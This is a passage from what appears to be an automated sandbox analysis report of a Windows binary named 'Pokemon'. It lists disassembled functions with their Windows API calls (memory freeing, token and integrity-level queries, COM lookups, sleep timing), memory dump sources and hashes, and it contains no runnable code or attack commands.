                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C31A5
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C31CC
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000C31D9
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000C31E2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7b9caa4694425c16965b45786dc6b1055abb030de6d4f05cd7719567dde45ed3
                                                                                                                                                                                                                                                                                      • Instruction ID: 079e112136a1c57b4f952b83b7dcb5ec417e70d6f864d37104fd47bcd5703fec
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b9caa4694425c16965b45786dc6b1055abb030de6d4f05cd7719567dde45ed3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9901F972661A007FA6226774EC89FAF15ADABD1371329443CFC1592592EE21CA424151
                                                                                                                                                                                                                                                                                      Function 000F08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?,?,000F0C4E), ref: 000F091B
                                                                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0936
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0944
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?), ref: 000F0954
                                                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0960
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6a10f7053a88b6b288aa8a889f5e7bc5610f61fe3ec0dad0bc453447fbf1354a
                                                                                                                                                                                                                                                                                      • Instruction ID: 8ca6cee8c8775da5d18e324ffd46e60c2a0a1c9f233c03c091653b2ba07555b1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a10f7053a88b6b288aa8a889f5e7bc5610f61fe3ec0dad0bc453447fbf1354a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6501A272604209BFEB214F55EC44BAA7BFDEF44751F140128FA05E2612E7B2DD91EBA0
                                                                                                                                                                                                                                                                                      Function 000FF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000FF2AE
                                                                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 000FF2BC
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 000FF2C4
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000FF2CE
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                      • Opcode ID: badb933c684ed89451f0bb77dcc9b961bdd0726a2e472e38c07d11f8064414f7
                                                                                                                                                                                                                                                                                      • Instruction ID: 10ef855f8aadc5ee1f5f11f74b06daba74f38cd84470c777c1bfdde95f3b7ba4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: badb933c684ed89451f0bb77dcc9b961bdd0726a2e472e38c07d11f8064414f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6016D71C0161EEBDF10AFA4E849AFDBB78FF08700F010466E601B2A50DB3096A5D7A1
                                                                                                                                                                                                                                                                                      Function 000F1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1A60
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A6C
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A7B
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A82
                                                                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F1A99
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 44d13b61977bb02bc28c3a1ce074f0609cdccf96e5106494cf0d6fb31e20db44
                                                                                                                                                                                                                                                                                      • Instruction ID: eb533ba4e19a94a98b6cfd223771db2b69d8bfacf131aacfc3de7fd5deb1d3f1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44d13b61977bb02bc28c3a1ce074f0609cdccf96e5106494cf0d6fb31e20db44
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 530181B5601605FFDB214F64EC49DAA3BADEF84364B210454F945C3660DB31DC91DA60
                                                                                                                                                                                                                                                                                      Function 000F1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000F1916
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000F1922
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000F1931
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000F1938
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000F194E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fd4b7a77c3274106af8633f2e8cb78a5cb6018a77f27c3b68b058d409ce3f3c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 1af379fe61a176b2adc08158243f2b55d63d594af47a350ad2edb1cd5f6f23cc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd4b7a77c3274106af8633f2e8cb78a5cb6018a77f27c3b68b058d409ce3f3c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F06275100305BFDB210F65EC4DF963BAEEF897A0F250414FA45D7660CA70DC619AA0
                                                                                                                                                                                                                                                                                      Function 000F1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000F1976
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000F1982
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1991
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1998
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F19AE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 26ad91b1a5199fd1d7f1c3afe65aee101bbf0142861d1fabd4d9e01f5c205f9f
                                                                                                                                                                                                                                                                                      • Instruction ID: aa51d949a38c4308cc0bc87d54db0fba118e85ac68cb472804912b318d799b62
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26ad91b1a5199fd1d7f1c3afe65aee101bbf0142861d1fabd4d9e01f5c205f9f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F06275104305BFD7214F65FC59F963BADEFC97A0F210414FA45C7660CA70D9618AA0
                                                                                                                                                                                                                                                                                      Function 00100CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CCB
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CD8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CE5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CF2
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CFF
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100D0C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ff4269edfc33c2889bd357886b7ff4633f52e6737fffa99aa1313ac1f863f3c3
                                                                                                                                                                                                                                                                                      • Instruction ID: 34c1516414449b10db9bd40bae1fd2a7f9ad553736bd12fd54fcd926db03d04a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff4269edfc33c2889bd357886b7ff4633f52e6737fffa99aa1313ac1f863f3c3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0401DC71800B059FCB31AFA6D980912FAF9BF503157108A3FD19252961C7B0A888CF80
                                                                                                                                                                                                                                                                                      Function 000F65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 000F65BF
                                                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 000F65D6
                                                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 000F65EE
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 000F660A
                                                                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 000F6624
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bc0fa0742bdf5122ddb5d8703a06972b5528de9c2c56b816e86d32247c979787
                                                                                                                                                                                                                                                                                      • Instruction ID: ebb2df30e86ae285d85bb7ba983475ae786047c6a66fbfe00776a61bdc4b7268
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc0fa0742bdf5122ddb5d8703a06972b5528de9c2c56b816e86d32247c979787
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71013630500708BBEB355F20ED4EBA67BB8FB10B05F000559A687A18E1DBF5AA959B54
                                                                                                                                                                                                                                                                                      Function 000CDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDAD2
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDAE4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDAF6
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDB08
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDB1A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d5c046fa998d3dc55f7f1577fd7937a46b99764829d48335ec0b826df7343b5
                                                                                                                                                                                                                                                                                      • Instruction ID: a47c150e92c1a80a4f52cb6d8cf3a4c0e809a1da680eb529233b5640c18abbcd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d5c046fa998d3dc55f7f1577fd7937a46b99764829d48335ec0b826df7343b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06F0F472544305EB86A4EB68F982E5E77EDAF147117A50C1EF01ADBD22CB20FCC08B65
                                                                                                                                                                                                                                                                                      Function 000C2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C262E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2640
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2653
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2664
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C2675
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 233724bce3684ffe46e196ec90005d7d6a55e235e3c23f0fb666c0e41b6c0bc1
                                                                                                                                                                                                                                                                                      • Instruction ID: 2dd31eead328c6ac1d360cccf315831846cf79be0a1cc281224e1242c5944dd4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 233724bce3684ffe46e196ec90005d7d6a55e235e3c23f0fb666c0e41b6c0bc1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0DA70841620AB8612EF58FC11E8C3BA4FB24B51305094EF415D6EB6CBB149C1AF95
                                                                                                                                                                                                                                                                                      Function 000C12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __freea$_free
                                                                                                                                                                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                      • API String ID: 3432400110-3206640213
